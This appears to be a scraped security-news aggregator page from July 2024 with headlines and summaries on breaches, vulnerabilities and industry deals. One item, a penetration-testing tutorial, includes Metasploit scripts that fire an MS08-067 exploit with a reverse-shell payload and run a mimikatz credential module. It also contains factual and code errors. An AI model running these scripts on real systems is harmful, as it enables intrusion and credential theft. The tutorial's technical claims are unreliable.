AguardNet's Space Management System does not properly validate user input, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.

LATEST NEWS

The latest news of links.

2024-07-25 15:28:00

Webinar: Securing the Modern Workspace: What Enterprises MUST Know about Enterprise Browser Security

The browser is the nerve center of the modern workspace. Ironically, however, the browser is also one of the least protected threat surfaces of the modern enterprise. Traditional security tools provide little protection against browser-based threats, leaving organizations exposed. Modern cybersecurity requires a new approach based on the protection of the browser itself, which offers both

by The Hacker News

2024-07-25 13:59:00

Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform

Cybersecurity researchers have disclosed a privilege escalation vulnerability impacting Google Cloud Platform''s Cloud Functions service that an attacker could exploit to access other services and sensitive data in an unauthorized manner. Tenable has given the vulnerability the name ConfusedFunction. ""An attacker could escalate their privileges to the Default Cloud Build Service Account and

by The Hacker News

2024-07-25 11:17:00

Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins

Docker is warning of a critical flaw impacting certain versions of Docker Engine that could allow an attacker to sidestep authorization plugins (AuthZ) under specific circumstances. Tracked as CVE-2024-41110, the bypass and privilege escalation vulnerability carries a CVSS score of 10.0, indicating maximum severity. ""An attacker could exploit a bypass using an API request with Content-Length set

by The Hacker News

2024-07-25 11:00:00

CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software

The Internet Systems Consortium (ISC) has released patches to address multiple security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could be exploited to trigger a denial-of-service (DoS) condition. ""A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition,"" the U.S. Cybersecurity and

by The Hacker News

2024-07-25 10:51:00

New Chrome Feature Scans Password-Protected Files for Malicious Content

Google said it''s adding new security warnings when downloading potentially suspicious and malicious files via its Chrome web browser. ""We have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions,"" Jasika Bawa, Lily Chen, and Daniel Rubery from the Chrome Security team said. To that

by The Hacker News

2024-07-25 10:00:55

IR Trends: Ransomware on the rise, while technology becomes most targeted sector

Although there was a decrease in BEC engagements from last quarter, it was still a major threat for the second quarter in a row.

by Cisco Talos Blog

2024-07-25 10:00:55

AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments

We explain how an automated BOLA detection tool harnessing GenAI discovered multiple BOLA vulnerabilities in open-source scheduling tool Easy!Appointments. The post AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-25 10:00:23

Buy a Microsoft Visual Studio Pro license for 90% off

Code faster and work smarter with a Microsoft Visual Studio Professional 2022 license, now on sale for $45.

by ZDNET Security

2024-07-25 09:52:06

Learning from CrowdStrike’s quality assurance failures

CrowdStrike has released a preliminary Post Incident Review (PIR) of how the flawed Falcon Sensor update made its way to millions of Windows systems and pushed them into a “Blue Screen of Death” loop. The PIR is a bit confusing to read and parse, because it attempts to assure readers that the company carefully and comprehensively tests their products – even though the company’s failures on that front are obvious. Here is the heart of … More → The post Learning from CrowdStrike’s quality assurance failures appeared first on Help Net Security.

by Help Net Security

2024-07-25 09:41:23

From Code to Threat Intel: How GitHub Monitoring Enhances Security Postures

In today’s interconnected digital world, platforms like GitHub have become indispensable for developers. They enable seamless collaboration, effective version control, and streamlined continuous integration and deployment (CI/CD) processes. However, this accessibility and openness also make these platforms attractive targets for cybercriminals. These bad actors exploit GitHub to introduce vulnerabilities, steal sensitive information, or inject malicious […] The post From Code to Threat Intel: How GitHub Monitoring Enhances Security Postures appeared first on ThreatMon Blog.

by ThreatMon

2024-07-25 09:38:44

Over Half of UK Workers Haven’t Received Training on Avoiding Phishing Scams

Security Awareness pros KnowBe4 have published findings on cybersecurity training among UK employees and the adoption of ‘best practice’ policies by organisations. The report, entitled ‘UK Cybersecurity Practices at Work’, highlights the various cybersecurity threats faced by modern organisations and expresses concern over the insufficient training received by employees across the UK. According to the […] The post Over Half of UK Workers Haven’t Received Training on Avoiding Phishing Scams first appeared on IT Security Guru. The post Over Half of UK Workers Haven’t Received Training on Avoiding Phishing Scams appeared first on IT Security Guru.

by IT Security Guru

2024-07-25 09:16:16

Thread Name-Calling – using Thread Name for offense

Research by: hasherezade Highlights: Introduction Process injection is one of the important techniques used by attackers. We can find its variants implemented in almost every malware. It serves purposes such as: Due to the fact that interference in the memory of a process by malicious modules can cause a lot of damage, all sorts of AV […] The post Thread Name-Calling – using Thread Name for offense appeared first on Check Point Research.

by Check Point Research

2024-07-25 09:00:30

CAST SBOM Manager automates creation and handling of SBOMs

CAST launched CAST SBOM Manager, a new freemium product designed for product owners, release managers, and compliance specialists. CAST SBOM Manager automates and simplifies the creation and handling of Software Bill of Materials (SBOMs), which North American and European governments now regularly require from their software providers. As the software supply chain faces unprecedented threats, maintaining accurate SBOMs has become critical for any organization that supplies software especially regulated device manufacturers with embedded software, government … More → The post CAST SBOM Manager automates creation and handling of SBOMs appeared first on Help Net Security.

by Help Net Security

2024-07-25 09:00:00

Google Boosts Chrome Protections Against Malicious Files

Google has announced improved protections for Chrome users when downloading files from the internet. The post Google Boosts Chrome Protections Against Malicious Files appeared first on SecurityWeek.

by SecurityWeek

2024-07-25 08:52:01

The Cyber Express Partners with Black Hat 2024 Desi Gala: A Night for Cybersecurity Leaders

July 25, 2024: The Cyber Express (TCE) is excited to announce its media partnership with the highly anticipated Black Hat 2024 Desi Gala Event, hosted by Suraksha Catalyst. This premier event promises to be an evening of networking, knowledge sharing, celebration, and plenty of fun. Exclusively bringing together CISOs, cybersecurity practitioners, and entrepreneurs, the Desi Gala Event, in collaboration with DSCI, a NASSCOM Initiative, will take place on August 6, 2024, in Las Vegas. Esteemed Speakers and Sponsors at Black Hat 2024 Desi Gala Event Get ready to be inspired by a lineup of top-notch speakers, including: Venkatesh Murthy, Senior Director at Data Security Council of India Dipesh Ranjan, Chief Partner Officer, SVP Global Growth & Sales - Americas, ANZ & Europe at Cyble Inc. Rohit Kohli, Aruneesh Salhotra, and Ankur Ahuja, Founding Advisors of Suraksha Catalyst. These esteemed speakers will deliver valuable insights into the ever-evolving cybersecurity landscape. And let’s not forget the fantastic sponsors making this event possible: Cyble, Palo Alto Networks, Risk Profiler, AppSOC, and Inspira. A Unique Networking Platform The Desi Gala Event is known for its engaging atmosphere and high-profile attendees. It’s a unique platform for cybersecurity professionals to connect, collaborate, and explore transformative opportunities. Expect an evening packed with insightful discussions, delectable food, and drinks. But that’s not all—get ready to hit the dance floor because the night will end with a Bollywood DJ night! It''s not just about business; it''s also about having a blast. Suraksha Catalyst: Bridging Indo-American Cybersecurity Leaders Suraksha Catalyst is dedicated to bringing together the Indo-American Cyber Alliance to foster collaboration, growth, and strategic partnerships. By uniting influential players from both nations, Suraksha Catalyst aims to unlock new avenues for innovation and business expansion, fortifying the cybersecurity landscape across India and the US. Key Initiatives by Suraksha Catalyst: Building strong relationships with over 500 cybersecurity leaders and industry associations in India and the US. Facilitating insight exchange to boost CISO resilience and innovation. Attracting investments into Indo-American cybersecurity portfolios. Strong vetting of portfolio companies by security practitioners. Connecting industry leaders for strategic partnerships. The Founding Advisors of Suraksha Catalyst include Ankur Ahuja, Rohit Kohli, and Aruneesh Salhotra, all of whom bring extensive experience in cybersecurity leadership. Exclusive and Invitation-Only Event The Black Hat 2024 Desi Gala Event is an exclusive, invitation-only gathering reserved solely for CISOs and cybersecurity practitioners. This exclusivity ensures a highly focused and relevant audience, enhancing the quality of interactions and discussions. For more information, please contact at info@surakshacatalyst.com. To register for the event CLICK HERE About The Cyber Express The Cyber Express is a leading publication dedicated to providing news and analysis about the information security industry. As a trusted resource for information security professionals, business leaders, ethical hackers, dark web researchers, cybersecurity influencers, and students, The Cyber Express delivers the latest trends and developments in the field. Through its media partnership with the Black Hat 2024 Desi Gala Event, The Cyber Express continues to support and amplify the voices of cybersecurity professionals worldwide. About Suraksha Catalyst Suraksha Catalyst, Indo-American Cyber Alliance is committed to fostering collaboration between Indo-American cybersecurity leaders and companies, driving growth, and creating strategic partnerships to enhance the global cybersecurity landscape. By connecting influential players from both nations, Suraksha Catalyst opens new avenues for innovation and business expansion. They achieve this by building strong relationships with over 500 cybersecurity leaders and industry associations in India and the US, facilitating insight exchange to boost CISO resilience and innovation, attracting investments into Indo-American cybersecurity portfolios, rigorously vetting portfolio companies, and connecting industry leaders for strategic partnerships. Contact Info:  Suraksha Catalyst: Mirinalilee Singh Community Manager milee@surakshacatalyst.com  or info@surakshacatalyst.com  Media Contact:  The Cyber Express Priti Chaubey Communications Manager  priti.c@thecyberexpress.com 

by The Cyber Express

2024-07-25 08:28:21

Phone Lines Down in Multiple Courts Across California After Ransomware Attack

Phone lines down in multiple courts across California after ransomware attack on state’s largest trial court in Los Angeles County. The post Phone Lines Down in Multiple Courts Across California After Ransomware Attack appeared first on SecurityWeek.

by SecurityWeek

2024-07-25 08:27:35

Phishing Attacks Hit Guernsey: ODPA Calls for Enhanced Cybersecurity Measures

In response to a notable increase in cyberattacks on Guernsey, the Office of the Data Protection Authority (ODPA) has issued a stern advisory urging heightened vigilance and enhanced security measures. Specifically, there has been a rise in phishing attacks targeting Microsoft 365 systems and launching cyberattacks on Guernsey. The perpetrators deceive users into divulging sensitive information via email. The ODPA highlighted concerns over the growing sophistication of cybercriminals, who are adept at circumventing standard security protocols, including multi-factor authentication (MFA). While MFA is widely regarded as an effective deterrent against account compromises, recent incidents have demonstrated that it was bypassed, highlighting the need for additional protective layers. The Rise of Cyberattacks on Guernsey ""Organizations must adopt a layered approach to cybersecurity,"" emphasized the ODPA, recommending comprehensive measures such as robust mail and web filtering, alongside rigorous staff training to enhance awareness of phishing tactics. This cautionary stance follows recent cyberattacks on Guernsey, targeting its IT network, and temporarily disrupting services including email and Microsoft Teams access for deputies. Prompt action by IT officials mitigates potential risks, preventing any compromise of data or systems. Despite the incident''s resolution, concerns were raised by Deputy Mark Helyar regarding the handling of password resets and communication protocols during the disruption. ""We signed a significant contract with Agilisys for IT support, yet the response to this incident raises questions about its adequacy and efficacy,"" voiced Deputy Helyar, reflecting broader dissatisfaction among officials regarding the incident management process. ODPA Shares Mitigation Against Guernsey Cyberattacks In response to these Guernsey cyberattacks, the ODPA has reiterated its guidance on mitigating phishing risks, emphasizing a proactive approach. They advise approaching all communications and requests with caution, irrespective of apparent legitimacy. Scrutinizing messages for common indicators of phishing attempts, such as urgent calls to action or unfamiliar sender details, is crucial. It''s also recommended that requests, particularly those involving sensitive information, be verified before responding. Additionally, confirming the legitimacy of suspicious messages through direct contact with purported senders via established channels is encouraged. The ODPA''s comprehensive guidelines aim to empower organizations and individuals to better safeguard against these state cyberattacks. By promoting a proactive security posture and fostering a culture of cyber-awareness, Guernsey seeks to bolster its resilience against future cyber threats. For more detailed information on protecting against phishing attacks and enhancing cybersecurity measures, organizations are encouraged to visit the ODPA''s official website. Stay informed, stay vigilant, and stay secure against cyberattacks on Guernsey and its people.

by The Cyber Express

2024-07-25 08:00:14

Lakera raises $20 million to secure GenAI applications

Lakera has raised $20 million in a Series A funding round. Led by European VC Atomico, with participation from Citi Ventures, Dropbox Ventures, and existing investors including redalpine, this investment brings Lakera’s total funding to $30 million. This funding positions Lakera at the forefront of the global economy’s race to secure GenAI applications. As part of this round, Atomico Partner Sasha Vidiborskiy will join Lakera’s board. It’s been predicted that by 2026, 80% of enterprises … More → The post Lakera raises $20 million to secure GenAI applications appeared first on Help Net Security.

by Help Net Security

2024-07-25 07:35:36

Nvidia Patches High-Severity Vulnerabilities in AI, Networking Products

Nvidia has patched high-severity vulnerabilities in its Jetson, Mellanox OS, OnyX, Skyway, and MetroX products. The post Nvidia Patches High-Severity Vulnerabilities in AI, Networking Products appeared first on SecurityWeek.

by SecurityWeek

2024-07-25 06:51:10

BIND 9.20 released: Enhanced DNSSEC support, application infrastructure improvements

BIND (Berkeley Internet Name Domain) is an open-source DNS software system with an authoritative server, a recursive resolver, and related utilities. BIND 9.20, a stable branch suitable for production use, has been released. According to the current software release plan, this branch will be supported for four years – until the first quarter of 2028. Who uses BIND? Major financial institutions National and international carriers Regional and community ISPs Retailers, manufacturers Universities and educational networks … More → The post BIND 9.20 released: Enhanced DNSSEC support, application infrastructure improvements appeared first on Help Net Security.

by Help Net Security

2024-07-25 06:38:31

Mimecast Expands Platform, Acquires Code42 for Advanced Insider Threat Management

Mimecast, a global Human Risk Management (HRM) platform, has announced its acquisition of Code42, a prominent name in insider threat management and data loss prevention. Founded in 2001 and headquartered in Minneapolis, Minnesota, Code42 has been instrumental in shaping the insider risk management category. Its solutions are FEDRAMP-authorized and can be configured for compliance with GDPR, HIPAA, PCI, and other frameworks. Financial terms of the deal have not been disclosed. However, this strategic move signifies Mimecast’s commitment to transforming how organizations handle human-centered security risks. Marc van Zadelhoff, Chief Executive Officer of Mimecast, highlighted the importance of this acquisition, stating, “Mimecast’s platform stands out in our crowded industry by focusing specifically on the critical moment of risk—a person opening their laptop. Unlike fragmented point solutions, Mimecast provides a connected approach that is engineered to offer complete visibility and strategic insight across customers’ ecosystems, enabling intervention that helps them prevent costly incidents caused by insider risk and data exfiltration. Integrating leading solutions like Code42 broadens and deepens our proven security and human risk management capabilities.” Enhancing Cloud-Native Security Capabilities Code42 is renowned for its cloud-native insider threat management and data loss prevention capabilities. These tools help businesses protect critical data from exposure, loss, leak, and theft while speeding up incident response times. With this acquisition, businesses will gain comprehensive visibility and strategic insight across an expanding attack surface, enhancing their ability to manage and mitigate security threats. Joe Payne, President & CEO of Code42, emphasized the importance of employee collaboration in modern organizations. “Protecting organizations from data exfiltration requires enhanced visibility into risky user activities across email, collaboration platforms, web, cloud, and more. By joining forces with Mimecast, we can help customers quickly detect and respond to threats across their expansive digital environments.” This acquisition aligns with Mimecast’s strong strategy to address human risk. Recently, the company unveiled its connected HRM platform and Mimecast Engage™ human risk awareness and training offering. These initiatives stemmed from the integration of Elevate Security technology, which Mimecast acquired in December 2023. Mimecast will continue to support Code42’s existing customer base, and Code42''s Incydr™ product is now available to Mimecast customers, with plans to integrate these capabilities into the Mimecast platform over the coming months. The sale was facilitated by Piper Sandler & Co., who advised Code42. Mimecast Unified Approach to Cyber Threats Mimecast’s AI-powered, API-enabled connected HRM platform is designed to protect organizations from a wide range of cyber threats. The platform enhances visibility and provides strategic insights that enable decisive actions, helping businesses protect their collaborative environments, safeguard critical data, and engage employees in reducing risk and boosting productivity. The integration of Code42’s capabilities into Mimecast’s HRM platform is expected to offer enhanced protection against insider threats and data loss. This collaboration aims to create a more secure and efficient digital environment for organizations, safeguarding their data while maintaining a collaborative culture among employees. By acquiring Code42, Mimecast is taking a significant step towards consolidating its position as a leader in human risk management, offering comprehensive solutions to address both insider and external threats. This acquisition not only enhances company’s product offerings but also reinforces its commitment to helping businesses navigate the complexities of the modern threat landscape with advanced, integrated security solutions.

by The Cyber Express

2024-07-25 06:38:16

Beware! Deceptive LNK Files Used in Indian Political Espionage Campaign

Cybersecurity researchers have uncovered a sophisticated cyber espionage campaign dubbed ""Operation ShadowCat"". This operation, orchestrated by a suspected Russian-speaking hacker group, employs advanced techniques to infiltrate systems, primarily targeting individuals with a vested interest in Indian political affairs. ShadowCat begins with the distribution of malicious files disguised as innocuous documents related to Indian parliamentary proceedings. These files, often in the form of deceptive .LNK shortcuts masquerading as legitimate Office documents, serve as the initial point of entry for unsuspecting victims. Once executed, these shortcuts trigger a sequence of events orchestrated to deploy a stealthy Remote Access Trojan (RAT) onto the victim''s machine. Unravelling Operation ShadowCat [caption id=""attachment_83721"" align=""alignnone"" width=""484""] Attack-Chain of Operation ShadowCat (Source: Cyble)[/caption] According to Cyble Research and Intelligence Labs (CRIL), the infection process unfolds with a PowerShell command embedded within the .LNK file, initiating the download and execution of a .NET loader. This loader is crucial as it acts as a conduit for delivering the final payload—a RAT written in the Go programming language.  This RAT is designed not only to establish persistent control over compromised systems but also to facilitate further malicious activities, including the deployment of ransomware and exfiltration of sensitive data. The cybercriminals behind ShadowCat leverage sophisticated techniques to evade detection and maintain persistence. Central to their strategy is the use of steganography—a method of concealing malicious payloads within seemingly innocuous PNG images hosted on Content Delivery Networks (CDNs).  By embedding Gzip-compressed payloads within these images, the attackers ensure that the malicious code remains hidden until runtime, thereby bypassing traditional security measures. [caption id=""attachment_83724"" align=""alignnone"" width=""780""] Malicious PowerShell script (Source: Cyble)[/caption] Moreover, the deployment of the RAT involves intricate steps, including Asynchronous Procedure Call (APC) injection into the PowerShell.exe process. This technique allows the malware to execute its payload discreetly, leveraging the unsuspecting host system''s resources without raising questions.  Targeted Audience and Countermeasures  The choice of lures—documents related to Indian political affairs—suggests a deliberate targeting strategy aimed at specific individuals within the political, journalistic, and analytical communities. Potential victims include government officials, political analysts, journalists, researchers, and think tanks actively monitoring and reporting on Indian parliamentary proceedings. This selective targeting highlights the strategic intent of the threat actors to acquire sensitive information and potentially influence political narratives. Interestingly, the attackers have implemented geo-location-based execution prevention mechanisms to exclude certain regions, particularly those where Russian-speaking communities reside. This geographical exclusion tactic provides further clues pointing toward the origin or affiliation of the threat actors behind the Operation. The Operation represents a sophisticated cyber espionage campaign targeting individuals interested in Indian political affairs. To defend against such threats, organizations and individuals are urged to implement rigorous cybersecurity measures. This includes enhancing email security protocols to effectively detect and quarantine suspicious attachments, especially those with .LNK extensions.  Additionally, deploying advanced endpoint protection solutions is essential to identify and mitigate PowerShell-based attacks and malicious .NET loaders. Furthermore, educating users about the risks posed by phishing attacks and social engineering tactics is crucial in building resilience against cyber espionage campaigns.

by The Cyber Express

2024-07-25 05:36:43

Hacker claims theft of Piramal Group’s employee data

A hacker claims to be selling data relating to thousands of current and former employees of India''s Piramal Group. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-25 05:00:00

Pro-Palestinian Actor Levels 6-Day DDoS Attack on UAE Bank

DDoS cyberattack campaign averaged 4.5 million requests per second, putting the bank under attack 70% of the time.

by Dark Reading

2024-07-25 04:30:32

How CISOs enable ITDR approach through the principle of least privilege

Somewhere, right now, a CISO is in a boardroom making their best case for stronger identity threat detection and response (ITDR) initiatives to lower the risk of intrusion. For a good reason, too: Look no further than the Change Healthcare breach, where the BlackCat gang allegedly used stolen credentials to gain access to company systems to deploy ransomware. And Change Healthcare isn’t an isolated incident; it’s part of a growing trend. The 2024 Verizon Data … More → The post How CISOs enable ITDR approach through the principle of least privilege appeared first on Help Net Security.

by Help Net Security

2024-07-25 04:00:54

Cloud security threats CISOs need to know about

In this Help Net Security interview, Ava Chawla, Head of Cloud Security at AlgoSec, discusses the most significant cloud security threats CISOs must be aware of in 2024. These threats include data breaches, misconfiguration, insider threats, advanced persistent threats, ransomware, API vulnerabilities, and supply chain vulnerabilities. These threats impact various sectors, including finance, healthcare, and retail, and Chawla provides insights into effective mitigation strategies. What are the most significant cloud security threats CISOs must know … More → The post Cloud security threats CISOs need to know about appeared first on Help Net Security.

by Help Net Security

2024-07-25 03:30:42

Researchers expose GitHub Actions workflows as risky and exploitable

GitHub is an immensely popular platform, with over 100 million developers and over 90% of Fortune 100 companies utilizing it. Despite its widespread use, many GitHub Actions workflows remain insecure, often due to excessive privileges or high-risk dependencies. In this Help Net Security video, Roy Blit, Head of Research at Legit Security, discusses a new Legit Security State of GitHub Actions Security report. The report unveils an especially concerning security posture and reveals that most … More → The post Researchers expose GitHub Actions workflows as risky and exploitable appeared first on Help Net Security.

by Help Net Security

2024-07-25 03:00:51

The most urgent security risks for GenAI users are all data-related

Regulated data (data that organizations have a legal duty to protect) makes up more than a third of the sensitive data being shared with GenAI applications—presenting a potential risk to businesses of costly data breaches, according to Netskope. The new Netskope Threat Labs research reveals three-quarters of businesses surveyed now completely block at least one GenAI app, which reflects the desire by enterprise technology leaders to limit the risk of sensitive data exfiltration. However, with … More → The post The most urgent security risks for GenAI users are all data-related appeared first on Help Net Security.

by Help Net Security

2024-07-25 00:39:47

Cybersecurity Firm KnowBe4 Tricked into Hiring North Korean Hacker as IT Pro

Cybersecurity firm KnowBe4 was tricked by a North Korean hacker posing as an IT worker whose next step…

by Hackread

2024-07-25 00:36:22

Python for Penetration Testing: Automating Cybersecurity with Python

Harnessing the Power of Python to Strengthen Cyber Defenses and Streamline Penetration Testing WorkflowsPhoto by Ferenc Almasi on UnsplashPython has become a staple language in the world of cybersecurity, particularly in the domain of penetration testing. Penetration testing, often referred to as ethical hacking, involves simulating cyber attacks to identify vulnerabilities in systems, networks, and applications before malicious actors can exploit them. Python’s simplicity, versatility, and extensive libraries make it an ideal choice for developing custom penetration testing tools and automating various phases of the testing process.In this article, we’ll explore how Python is used in penetration testing tools and frameworks like Metasploit, Nmap, and Scapy. We’ll delve into scripting techniques for automating different phases of penetration testing, including reconnaissance, exploitation, and post-exploitation.What Is Penetration Testing?Penetration testing, often referred to as pen testing or ethical hacking, is a proactive cybersecurity assessment technique used to identify and exploit vulnerabilities in systems, networks, and applications. The primary objective of penetration testing is to simulate real-world cyber attacks to assess the security posture of an organization’s digital assets and infrastructure.Here’s a breakdown of the key aspects of penetration testing:Purpose:The main purpose of penetration testing is to uncover security weaknesses before malicious actors can exploit them. By identifying vulnerabilities and misconfigurations, organizations can remediate issues and strengthen their overall security posture.Methodology:Penetration testing typically follows a systematic approach that involves reconnaissance, scanning, exploitation, and post-exploitation activities. Testers use a variety of tools, techniques, and methodologies to simulate different types of cyber attacks, including but not limited to network attacks, web application attacks, and social engineering attacks.Types of Penetration Testing:Black Box Testing: Testers have no prior knowledge of the target system and simulate an external attacker.White Box Testing: Testers have full knowledge of the target system, including network diagrams, source code, and architecture details.Gray Box Testing: Testers have partial knowledge of the target system, simulating an insider threat or a compromised user account.Scope:Penetration testing can be conducted at various levels of the technology stack, including network infrastructure, web applications, mobile applications, cloud services, and IoT devices. The scope of a penetration test is defined based on the organization’s specific goals, assets, and risk tolerance.Reporting:After completing the penetration testing process, testers compile a detailed report that outlines the findings, including identified vulnerabilities, exploitation techniques, and recommendations for remediation. The report provides actionable insights for stakeholders to prioritize and address security issues effectively.Compliance and Regulations:Penetration testing is often required by regulatory frameworks and industry standards such as PCI DSS (Payment Card Industry Data Security Standard), HIPAA (Health Insurance Portability and Accountability Act), and GDPR (General Data Protection Regulation). Compliance mandates may specify the frequency and scope of penetration testing activities.Continuous Improvement:Penetration testing is not a one-time activity but rather an ongoing process. Organizations should conduct regular penetration tests to assess their evolving security posture and ensure that new vulnerabilities are promptly identified and addressed. Continuous improvement is essential to stay ahead of emerging threats and maintain resilience against cyber attacks.Python in Penetration Testing Tools:Metasploit:Metasploit is one of the most popular penetration testing frameworks used by cybersecurity professionals worldwide. While Metasploit is primarily written in Ruby, it provides a Python interface (msfconsole) for scripting and automation. Python scripts can be used to interact with Metasploit modules, automate exploit delivery, and perform post-exploitation tasks.# Example Python script to interact with Metasploit''s RPC APIfrom metasploit.msfrpc import MsfRpcClient# Connect to the Metasploit RPC serverclient = MsfRpcClient(''your-msf-host'', port=55553, username=''msf'', password=''msf'')# List available exploitsexploits = client.modules.exploitsfor exploit in exploits: print(exploit)Nmap:Nmap (Network Mapper) is a powerful open-source tool used for network discovery and security auditing. While Nmap itself is written in C and Lua, it offers Python bindings (Nmap Scripting Engine — NSE) for developing custom scripts to extend its functionality. Python scripts can be used to perform advanced network scans, detect open ports, and identify vulnerable services.# Example Python script using Nmap''s Python bindingsimport nmap# Create an Nmap PortScanner objectscanner = nmap.PortScanner()# Scan target IP addresses for open portsscanner.scan(''192.168.1.0/24'', arguments=''-p 22,80,443'')# Print scan resultsfor host in scanner.all_hosts(): print(f"Host: {host}") print(f"Open ports: {scanner[host][''tcp''].keys()}")Scapy:Scapy is a versatile packet manipulation tool written in Python. It allows cybersecurity professionals to craft custom packets, send them over the network, and analyze responses. Scapy’s flexibility makes it invaluable for conducting network reconnaissance, packet sniffing, and protocol exploitation during penetration testing engagements.# Example Python script using Scapy for network reconnaissancefrom scapy.all import *# Send an ICMP echo request to a target hostresponse = sr1(IP(dst="192.168.1.1")/ICMP())# Print the responseif response: response.show()else: print("No response received.")Scripting Techniques for Penetration Testing:Reconnaissance:Python scripts can automate the reconnaissance phase by gathering information about the target network, such as IP addresses, open ports, services running on those ports, and network topology. Libraries like Nmap and Scapy can be used to perform active and passive reconnaissance scans.# Example Python script for network reconnaissance using Nmapimport nmap# Create an Nmap PortScanner objectscanner = nmap.PortScanner()# Scan target IP addresses for open portsscanner.scan(''192.168.1.0/24'', arguments=''-T4 -F'')# Print scan resultsfor host in scanner.all_hosts(): print(f"Host: {host}") print(f"Open ports: {scanner[host][''tcp''].keys()}")Exploitation:Python scripts can automate the exploitation of discovered vulnerabilities by leveraging Metasploit modules or custom exploit code. Scripts can be developed to identify vulnerable systems, select appropriate exploits, and launch attacks against target hosts.# Example Python script for exploiting a vulnerability using Metasploit''s RPC APIfrom metasploit.msfrpc import MsfRpcClient# Connect to the Metasploit RPC serverclient = MsfRpcClient(''your-msf-host'', port=55553, username=''msf'', password=''msf'')# Get a list of available exploitsexploits = client.modules.exploits# Select an exploit (e.g., exploit/windows/smb/ms08_067_netapi)exploit = exploits.use(''exploit/windows/smb/ms08_067_netapi'')# Configure the exploit parametersexploit[''RHOST''] = ''target-ip''exploit[''PAYLOAD''] = ''windows/meterpreter/reverse_tcp''# Execute the exploitexploit.execute()Post-Exploitation:Python scripts can automate post-exploitation activities, such as privilege escalation, lateral movement, and data exfiltration, after gaining initial access to a target system. Scripts can interact with operating system APIs, manipulate files and directories, and execute commands remotely.# Example Python script for post-exploitation using Metasploit''s RPC APIfrom metasploit.msfrpc import MsfRpcClient# Connect to the Metasploit RPC serverclient = MsfRpcClient(''your-msf-host'', port=55553, username=''msf'', password=''msf'')# Get a list of available post modulespost_modules = client.modules.exploits# Select a post module (e.g., exploit/windows/local/mimikatz)post_module = post_modules.use(''exploit/windows/local/mimikatz'')# Configure the post module parameterspost_module[''SESSION''] = 1# Execute the post modulepost_module.execute()Conclusion:Python plays a crucial role in modern penetration testing, enabling cybersecurity professionals to develop custom tools and automate various phases of the testing process. By leveraging Python’s simplicity and extensive libraries, practitioners can enhance their efficiency and effectiveness in identifying and mitigating security risks. As cyber threats continue to evolve, Python remains an indispensable tool in the arsenal of ethical hackers and security researchers, empowering them to defend against emerging threats and protect digital assets.Python for Penetration Testing: Automating Cybersecurity with Python was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

2024-07-25 00:34:58

Michigan Medicine data breach impacted 56953 patients

A cyber attack against Michigan Medicine resulted in the compromise of the personal and health information of approximately 57,000 patients. The academic medical center of the University of Michigan, Michigan Medicine, suffered a data breach that impacted 56953 patients. The security incident exposed the personal and health information of the patients. Michigan Medicine notified patients […]

by Security Affairs

2024-07-24 23:24:16

Philippines Shuts Down Online Gambling In Effort to Curb Financial Scamming

In a bold move to address the country''s growing concerns, President Ferdinand Marcos Jr. has announced a total ban on Philippine Offshore Gaming Operators (POGOs) in the Philippines. This decision comes after years of controversy and allegations of illegal activities linked to POGOs. In his third State of the Nation Address (SONA), Marcos emphasized the need to stop the ""grave abuse and disrespect to our system of laws"" and to put an end to the ""panggulo"" (nonsense) that has plagued the country. He also directed the Philippine Amusement and Gaming Corporation (PAGCOR) to wind down and cease POGO operations by the end of the year. Philippines Government Helps Displaced Employees As the ban takes effect, the Philippine government has vowed to help Filipino POGO workers find new jobs. Finance Secretary Ralph Recto assured that the government would assist Filipino POGO workers in finding new employment. ""We have until the end of the year to ensure that all displaced Filipino workers will have new jobs,"" Recto said. He added that the Department of Finance would collaborate with the Department of Labor and Employment to provide reskilling and upskilling training. [caption id=""attachment_83672"" align=""alignnone"" width=""2250""] Source: pco.gov.ph[/caption] National Economic and Development Authority Secretary Arsenio Balisacan downplayed the economic impact of the ban, noting that POGOs contributed less than 0.5% to the country''s GDP in 2022. He emphasized that the social and reputational costs of hosting POGOs outweigh their economic benefits. Other government agencies, such as the Department of Social Welfare and Development (DSWD) and the Department of Labor and Employment (DOLE), have also pledged to provide assistance to affected workers. The DSWD has indicated its desire to use other shutdown POGO hubs to convert them into shelters for reached-out individuals. Addressing Social Concerns and Illegal Activities The Department of the Interior and Local Government (DILG) has directed local government units (LGUs) to scrutinize documents of establishments as the first line of defense in granting business permits. The DILG chief has also emphasized the importance of coordination with proper authorities to ensure that only legitimate businesses are allowed to operate. The ban comes in response to numerous reports of criminal activities linked to POGOs, including financial scams, money laundering, human trafficking and violent crimes. Marcos acknowledged that while the ban would solve many problems, it wouldn''t address all issues. Department of Social Welfare and Development Secretary Rex Gatchalian outlined plans to assist both Filipino and foreign workers affected by the ban. The government will provide temporary housing, cash aid and support for those wishing to start small businesses. In light of the ban, Interior Secretary Benjamin Abalos Jr. has directed local government units to scrutinize business permit applications more closely to prevent illegal operations from continuing under different guises. As the Philippines moves to implement this significant policy change, the government faces the challenge of balancing economic considerations with social welfare and national security concerns.

by The Cyber Express

2024-07-24 22:46:25

Stolen Documents From Pentagon IT Provider Leidos Leaked By Hackers

